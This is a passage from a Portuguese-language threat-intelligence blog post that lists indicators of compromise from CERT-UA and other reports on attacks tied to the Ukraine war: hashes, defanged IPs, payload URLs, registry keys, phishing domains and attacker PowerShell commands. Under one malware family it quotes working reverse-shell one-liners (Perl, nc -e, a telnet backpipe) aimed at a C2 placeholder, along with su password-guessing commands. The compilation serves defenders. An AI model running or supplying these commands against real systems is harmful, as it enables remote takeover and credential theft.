        • powershell.exe -w hid -nop -c %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\python.exe %LOCALAPPDATA%\python\python-3.10.0-embed-amd64\Client.py
        • powershell.exe -w hid -nop -c Expand-Archive -Force %PROGRAMDATA%\python.zip %PROGRAMDATA%\python
        • powershell.exe -w hid -nop -c start "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemUpdate.lnk" 
        • powershell.exe -w hid -nop gpresult /z
        • powershell.exe -w hid -nop gpupdate 
        • powershell.exe Compress-Archive -Force %USERPROFILE%\Desktop\ %LOCALAPPDATA%\sys.zip
        • powershell.exe Compress-Archive -Force %USERPROFILE%\Desktop\*.lnk %LOCALAPPDATA%\11.zip
        • powershell.exe Compress-Archive %USERPROFILE%\Desktop %LOCALAPPDATA%\sys.zip 
        • powershell.exe Expand-Archive -Force %LOCALAPPDATA%\python.zip %LOCALAPPDATA%\python
        • powershell.exe Get-ADDomainController 
        • powershell.exe Get-Content %LOCALAPPDATA%\i.lnk
        • powershell.exe Get-DnsClientServerAddress powershell.exe Get-NetAdapter
        • powershell.exe Get-NetAdapterBinding | Where-Object ComponentID -EQ 'ms_tcpip6'
        • powershell.exe Get-NetIPConfiguration -All
        • powershell.exe Resolve-DNSName %DC%
        • powershell.exe Resolve-DNSName %DOMAIN%.local
        • powershell.exe Test-NetConnection %FS% -Port 445 -v
        • powershell.exe [System.Directoryservices.Activedirectory.Domain]::GetCurrentDomain() powershell.exe date
        • powershell.exe dir %USERPROFILE%\Desktop
        • powershell.exe ipconfig /flushdns
        • powershell.exe net start dnscache
        • powershell.exe net stop dnscache
    • Poemgate e Poseidon (CERT-UA)
      • Arquivos:
        • ps (SOCKS5): 2b88885fb57e28497522238bd8f8befc 8ddd681dd834ab66f6a1c00ba2830717bf845de5639708eb8e8ab795ffd1df5a
        • pam_unix.so (POEMGATE): 5d9a661f35d4e136d389bea878c4252f eb01925836eed1dbd85a8ab9aa05c5c45dc051abaae9e67db3a53489d776b6c2
        • pam_unix.so (POEMGATE): 20a07ba71cab0f92c566b31e96fdf0e8 9060ca8e829fc136d1ecd95a5204abb48f3ce5b7339619c5668c7e176dcbb235 
        •  pam_unix.so (POEMGATE): a74dbcae530f52f62cbdcef3dc18feee e9c5dc9cec95f31cea2eb88cc26a35d29c5f89f23bff6a7cfa1250dec6d5701a 
        • wccrt (WHITECAT): 45fad72d370ff88c5b349cb741cc26ce 8fb3ed6261a2358e0890bfd544e515af232f87d3aef947e09f640da7cc1b89d9
        • libs.so (POSEIDON): 59f2c3f6e4baf721c02a66179147241a 0e24a1268212a790bc3993750f194ac1e0996a6770b32b498341f06abac45d81
        • 75cde685cd3f00f354155e3c433698c7 e4cff7071e184e3f1bfedfe30afa52ddd2cac1a00983508d142e51ecebfcba14 .1 
        • script.txt: 61b70767326387f141a18e2fbb250a68 b5ec1d43462a770d207eefb906516631e4d80eea55779509616b58b39a764455
        • scan.sh: 302f158ca6f6094e90bd43f7748dd65f 65c880f2a3833898c54d7f48ee0709a13887376b2ea5bc933b2e70f29614e728
      • Rede:
        • eurotelle[.]com
        • 103[.]251.167.20
        • 103[.]251.167.21
        • 104[.]244.72.8
        • 107[.]189.30.69
        • 139[.]99.237.205
        • 146[.]59.233.33
        • 146[.]59.35.246
        • 156[.]146.63.139
        • 158[.]118.218.193
        • 162[.]247.73.192 
        • 162[.]247.74.201
        • 162[.]247.74.206
        • 162[.]247.74.216
        • 162[.]247.74.27
        • 162[.]247.74.74 
        • 167[.]86.94.107
        • 171[.]25.193.20
        • 171[.]25.193.235
        • 171[.]25.193.25
        • 171[.]25.193.77 
        • 171[.]25.193.78
        • 179[.]43.159.195
        • 179[.]43.159.198
        • 182[.]118.218.193 
        • 185[.]100.86.121
        • 185[.]100.87.41
        • 185[.]129.61.129
        • 185[.]129.61.7
        • 185[.]129.62.62 
        • 185[.]130.47.58
        • 185[.]14.28.207
        • 185[.]165.169.239
        • 185[.]220.101.152 
        • 185[.]220.102.240
        • 185[.]220.102.241
        • 185[.]220.102.242
        • 185[.]220.102.247 
        • 185[.]220.102.251
        • 185[.]220.102.252
        • 185[.]220.102.253
        • 185[.]220.102.254
        • 185[.]220.102.8
        • 185[.]220.103.8
        • 185[.]233.100.23
        • 185[.]235.146.29 
        • 185[.]241.208.206
        • 185[.]241.208.232
        • 185[.]246.188.60
        • 185[.]246.188.67
        • 185[.]246.188.74
        • 185[.]254.75.55
        • 185[.]34.33.2
        • 185[.]56.83.83
        • 185[.]67.82.114
        • 192[.]42.116.13 
        • 192[.]42.116.16
        • 192[.]42.116.18
        • 192[.]42.116.23
        • 192[.]42.116.25
        • 193[.]218.118.158 
        • 193[.]218.118.182
        • 195[.]69.202.145
        • 203[.]28.246.189
        • 204[.]28.48.77
        • 204[.]8.156.142 
        • 217[.]12.208.73
        • 23[.]129.64.133
        • 2[.]56.164.52
        • 2[.]58.56.101
        • 45[.]139.122.241 
        • 45[.]141.215.111
        • 45[.]154.98.225
        • 46[.]182.21.248
        • 51[.]89.153.112
        • 5[.]181.80.132
        • 5[.]252.118.19
        • 5[.]255.99.205
        • 5[.]45.73.243
        • 62[.]102.148.68
        • 62[.]182.84.146 
        • 77[.]48.28.204
        • 77[.]48.28.236
        • 79[.]137.194.146
        • 80[.]67.167.81
        • 82[.]221.128.191 
        • 84[.]239.46.144
        • 89[.]147.111.106
        • 89[.]248.165.181
        • 91[.]208.75.153
        • 91[.]208.75.3 
        • 91[.]224.92.110
        • 94[.]102.51.15
        • 95[.]214.234.139
        • 95[.]214.55.43 
      • Sistema operacional:
        •  /lib/libc.so.7
        • /lib/x86_64-linux-gnu/libs.so
        • /lib/x86_64-linux-gnu/security/pam_unix.so
        • /tmp/.1
        • /usr/sbin/wccrt
        • /usr/sbin/wcc
        • /var/lib/vim‍/ps
        • /var/lib/vim‍/vfth/scan.sh expect -c 'spawn su -c "whoami" "%user%"; expect -re "assword"; send "%password%"; expect eof;' 2>&1 perl -e 'use Socket;$i="%C2IP%";$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 2>&1 python -c 'import pexpect as p,sys;c=p.spawn("su %user% -c whoami");c.expect(".*assword:");c.sendline("r3b3iFv4r3b3iFv4");i=c.expect([p.EOF,p.TIMEOUT]);sys.stdout.write(c.before[3:] if i!=p.TIMEOUT else "")' 2>&1 sleep 1; nc -e /bin/sh %C2IP% 3333 2>&1 sleep 1;rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet %C2IP% 3333 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe 2>&1
        • /bin/false 
        • /bin/nologin
        • /usr/sbin/cron
    • PurpleFox (CERT-UA(NOVO)
      • Hashes:
        • MSI9BB2.tmp (DIRTYMOE MSI)
          • 843b9a7dac964a9d242b8174e8d16227
          • 6d817e8cd54c3a21f6d4aa437b16663a2a40b726014a8de1cbf9343101a0ab62 
        • C558B828.Png (DIRTYMOE MSI) 
          • c12241be2c41ae69187ca9faf83494ff 
          • 43eef76fa966395bde56b4e3812831ca75ad010e3b8216103358deb09bdc14d1 
        • sysupdate.log
          • 191a5e1c2fab01634748e6f30c097fbd 
          • 3eea47b22bc68089440a40b3f899665e3584c845d8c302872e1d93b62fa59fab 
        • winupdate32.log
          • 8c0768c82df223bebe24375f5964d2bb 
          • e8e529957fda9fc2c271d3fed6fe744bb62b3f5d3f47db0b6e45afdd7c9fd9fc 
        • winupdate64.log
          • 1c17d105e0ad36459ac40fbf1aec6f95 
          • 6dc323456042048bdd0260c87e0deea082c855c53b6f948dbb5be27a3d721ded 
        • winupdate64.log.unpacked
          • c6a26ec425627730c0e17c5e68ad7ee8 
          • ea4c2f895f7b1c46aa8de559e7a6d8201b49437332d6d5e859052276db50c6c4
        • KewDriver32L.bin
          • f9eac6143f31bdb4ea5bf8cc8017c7bf 
          • c4c6f2c4452a540b2c69dc6164887d6014f6ab02d203bb56753c89863e840e46 
        • KewDriver64L.bin
          • f6284c8a22be3be7bc57e14533295584 
          • aaba7db353eb9400e3471eaaa1cf0105f6d1fab0ce63f1a2665c8ba0e8963a05 
        • KewSetupAs32.bin
          • 9620e0d47aa20f31ac21a2fc2de21f46 
          • d627d4b6b8e15c4538776d8dcb03c4029b461144f921589655509b9f4aab4c65 
        • KewRunCode.bin
          • a7f8fa8f44034ab8176e02f15ebae504 
          • f957af223174a135b23c48e40a4de50494737f3d6e10e193510446e27ebb7595 
        • KewSetupAs64.bin
          • 135605de47aaad4140bdce443b24b24d 
          • 326bb4222a2f42d4f4ca455fbe97c7ae0784fb14538b0f5d4f5088acb981fbe9 
        • KewDriver32H.bin
          • b5f85c26d7aa5a1fb4af5821b6b5ab9b 
          • b3b5fff57040c801a4392da2af83f4bf6200c575aa4a64ab9a135b58aa516080 
        • KewNetCode.bin
          • 80ea4b5ada49ae2f18a62aa16665e060 
          • 29db0e21d078018f85bea7c0906a7894a4b78e74707f1cbac8f9f462eaecad23 
        • KewDriver64H.bin
          • 75540c21874be37b2087de213b2f55c2 
          •  eb29edd6211836e6d1877a1658e648beb749091ce7d459dbd82dc57c84bc52b1 
        • MsE96454E6App.dll (DIRTYMOE)
          • fde752850864fc4dde67f5da7e44b176 
          •  937e0068356e42654c9ab76cc34cf74dfa4c17b29e9439ebaa15d587757b14b0 
        • TKE96454E6MS.sdb
          • f12332acf2b94bda02eabb5a5d24d179 
          •  31f50cb8ae6d41a410a39efd020ea0ed05add98df48c4257dfb8441bc6c57856 
        • RCE96454E6MS.sdb
          • a240accad68ced374b9e90bb0b642d9f 
          •  395a3bd57246241f2c2b5efc427afbf5083facbde30b0199335f4102f73b8ae6 
        • DBE96454E6MK.sdb
          • ae5fa12b6862cf49f5f44a4bfcdbfd0a 
          •  3184ecf43310e2487be0073a6041d292dab1f176560edf2e8e60d594ad5d2ab2
      • Sistema Operacional:
        • C:\Program Files\dvhvA\dvhvA C:\Temp\MSI9BB2.tmp 
        • C:\Windows\AppPatch\DBAB4E9928MK.sdb 
        • C:\Windows\AppPatch\DBBA4B6B3AMK.sdb 
        • C:\Windows\AppPatch\DBE96454E6MK.sdb 
        • C:\Windows\AppPatch\RCAB4E9928MS.sdb 
        • C:\Windows\AppPatch\RCBA4B6B3AMS.sdb 
        • C:\Windows\AppPatch\RCE96454E6MS.sdb 
        • C:\Windows\AppPatch\TKAB4E9928MS.sdb 
        • C:\Windows\AppPatch\TKBA4B6B3AMS.sdb 
        • C:\Windows\AppPatch\TKE96454E6MS.sdb 
        • C:\Windows\System32\MsAB4E9928App.dll 
        • C:\Windows\System32\MsBA4B6B3AApp.dll 
        • C:\Windows\System32\MsE96454E6App.dll 
        • HKEY_LOCAL_MACHINE\ControlSet001\Services\AC0[0-9] (WindowsXP) 
        • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\MsE96454E6App 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\services\MsAB4E9928App 
        • HKEY_LOCAL_MACHINE\Software\Microsoft\DirectPlay8\Direct3D (додаткові артефакти) 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Control\SafeBoot\Minimal\dump_BA4B6B3A.sys 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Control\SafeBoot\Minimal\MsAB4E9928App 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Control\SafeBoot\Minimal\MsBA4B6B3AApp 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Control\SafeBoot\Network\MsAB4E9928App 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Control\SafeBoot\Network\MsBA4B6B3AApp 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Enum\Root\LEGACY_DUMP_BA4B6B3A 
        • HKEY_LOCAL_MACHINE\System\ControlSet001\Enum\Root\LEGACY_DUMP_LUAFV
      • Rede:
        • hXXp://103[.]39.232.29:18601/C558B828[.]Png 
        • hXXp://103[.]73.161.184:17487/C558B828[.]Png 
        • hXXp://103[.]97.202.40:11592/08388E25[.]Png 
        • hXXp://110[.]45.196.155:14753/C558B828[.]Png 
        • hXXp://112[.]26.121.7:19139/C558B828[.]Png 
        • hXXp://113[.]161.145.95:19153/C558B828[.]Png 
        • hXXp://114[.]244.48.11:19650/C558B828[.]Png 
        • hXXp://118[.]97.59.84:18079/C558B828[.]Png 
        • hXXp://121[.]201.103.253:18101/C558B828[.]Png 
        • hXXp://121[.]22.124.78:17535/C558B828[.]Png 
        • hXXp://123[.]192.32.191:18102/C558B828[.]Png 
        • hXXp://138[.]68.78.116:11016/08388E25[.]Png 
        • hXXp://138[.]68.78.116:11016/C558B828[.]Png 
        • hXXp://144[.]172.122.165:15673/C558B828[.]Png 
        • hXXp://149[.]88.77.33:19566/C558B828[.]Png 
        • hXXp://159[.]89.31.59:16801/08388E25[.]Png 
        • hXXp://160[.]3.221.54:15591/08388E25[.]Png 
        • hXXp://160[.]3.221.54:15591/C558B828[.]Png 
        • hXXp://170[.]246.224.162:15427/08388E25[.]Png 
        • hXXp://170[.]246.224.162:15427/C558B828[.]Png 
        • hXXp://172[.]93.220.105:20127/08388E25[.]Png 
        • hXXp://172[.]93.220.105:20127/C558B828[.]Png 
        • hXXp://173[.]230.225.13:11843/C558B828[.]Png 
        • hXXp://178[.]128.103.246:17880/08388E25[.]Png 
        • hXXp://178[.]128.103.246:17880/C558B828[.]Png 
        • hXXp://187[.]189.218.211:16789/C558B828[.]Png 
        • hXXp://187[.]39.137.14:12399/C558B828[.]Png 
        • hXXp://187[.]84.208.218:17009/C558B828[.]Png 
        • hXXp://190[.]111.12.242:17742/C558B828[.]Png 
        • hXXp://192[.]250.197.178:16932/08388E25[.]Png 
        • hXXp://195[.]154.237.3:20175/C558B828[.]Png 
        • hXXp://195[.]189.28.244:17807/C558B828[.]Png 
        • hXXp://201[.]230.62.167:15840/C558B828[.]Png 
        • hXXp://212[.]233.205.81:17849/08388E25[.]Png 
        • hXXp://212[.]233.205.81:17849/C558B828[.]Png 
        • hXXp://219[.]150.217.124:11825/08388E25[.]Png 
        • hXXp://219[.]150.217.124:11825/C558B828[.]Png 
        • hXXp://220[.]194.177.52:14975/C558B828[.]Png 
        • hXXp://221[.]199.171.174:16543/08388E25[.]Png 
        • hXXp://221[.]199.171.174:16543/C558B828[.]Png 
        • hXXp://221[.]230.11.85:18156/C558B828[.]Png 
        • hXXp://222[.]186.134.123:11700/08388E25[.]Png 
        • hXXp://222[.]92.147.235:17538/C558B828[.]Png 
        • hXXp://36[.]7.175.92:18879/08388E25[.]Png 
        • hXXp://36[.]7.175.92:18879/C558B828[.]Png 
        • hXXp://41[.]33.183.69:19811/C558B828[.]Png 
        • hXXp://60[.]223.244.12:11053/C558B828[.]Png 
        • hXXp://61[.]146.235.242:17770/C558B828[.]Png 
        • hXXp://61[.]160.233.68:19583/C558B828[.]Png 
        • hXXp://64[.]227.152.193:18336/08388E25[.]Png 
        • hXXp://64[.]227.152.193:18336/C558B828[.]Png 
        • hXXp://74[.]96.232.10:19408/C558B828[.]Png 
        • hXXp://85[.]191.122.242:17756/C558B828[.]Png 
        • hXXp://89[.]111.243.60:17320/08388E25[.]Png 
        • hXXp://8[.]137.17.159:15066/C558B828[.]Png 
        • hXXp://91[.]135.200.114:10872/C558B828[.]Png
        • rpc.1qw[.]us
        • ret.6bc[.]us 
        • kew.1qw[.]us
        • kew.8df[.]us
        • nk.1qw[.]us
    OBS: O malware que eu identifiquei acima como Winter Vivern na verdade não teve um nome específico report original do CERT-UA. Por isso, optei por identificar esse caso com o nome do grupo responsável pelo ataque. Idem para o caso da 'Campanha "Cloaked Ursa"', que não recebeu um nome específico do pessoal da Unit-42.

    Segundo a Secureworks, os domínios abaixo foram usados para ataques de phishing reportados pelo CERT da Ucrânia em 25/02:

    • ua-passport[.]space
    • bigmir[.]space
    • mirrohost[.]space
    • mil-gov[.]space
    • verify-email[.]space
    • verify-mail[.]space
    • creditals-email[.]space
    • meta-ua[.]space
    • i-ua[.]space
    • kontrola-poczty[.]space
    • walidacja-poczty[.]space
    • weryfikacja-poczty[.]space
    • konto-verify[.]space 
    • weryfikacja-konta[.]space
    • walidacja-uzytkownika[.]space
    • akademia-mil[.]space
    • ron-mil[.]space

    Para saber mais:
    PS: Post atualizado em 11/04, 30/08, 30/09, 19/10 e 09/11. Atualizado novamente em 07 e 20/12. Ano novo e o conflito continua, infelizmente. Post atualizado em 09 e 12/01/2023. Atualizado em 13/04, 08/05, 26/06 e 11+14/07. Atualizado em 03/08, 02/10, 30/11 e 22+29/12. Atualizado em 16/01 e 15/09/2024.

    PS/2: Na tentativa de evitar que esse post continue sendo suspenso pelo blogger acusado de desrespeitar a política de conteúdo sobre Malware e Vírus, eu revisei todos os IOCs para garantir que os endereços de domínios e IPs fossem parcialmente obfuscados usando colchetes ([ e ]), como é padrão da indústria. (26/06/23)

    Nenhum comentário:

    Creative Commons License
    Disclaimer: The views expressed on this blog are my own and do not necessarily reflect the views of my employee.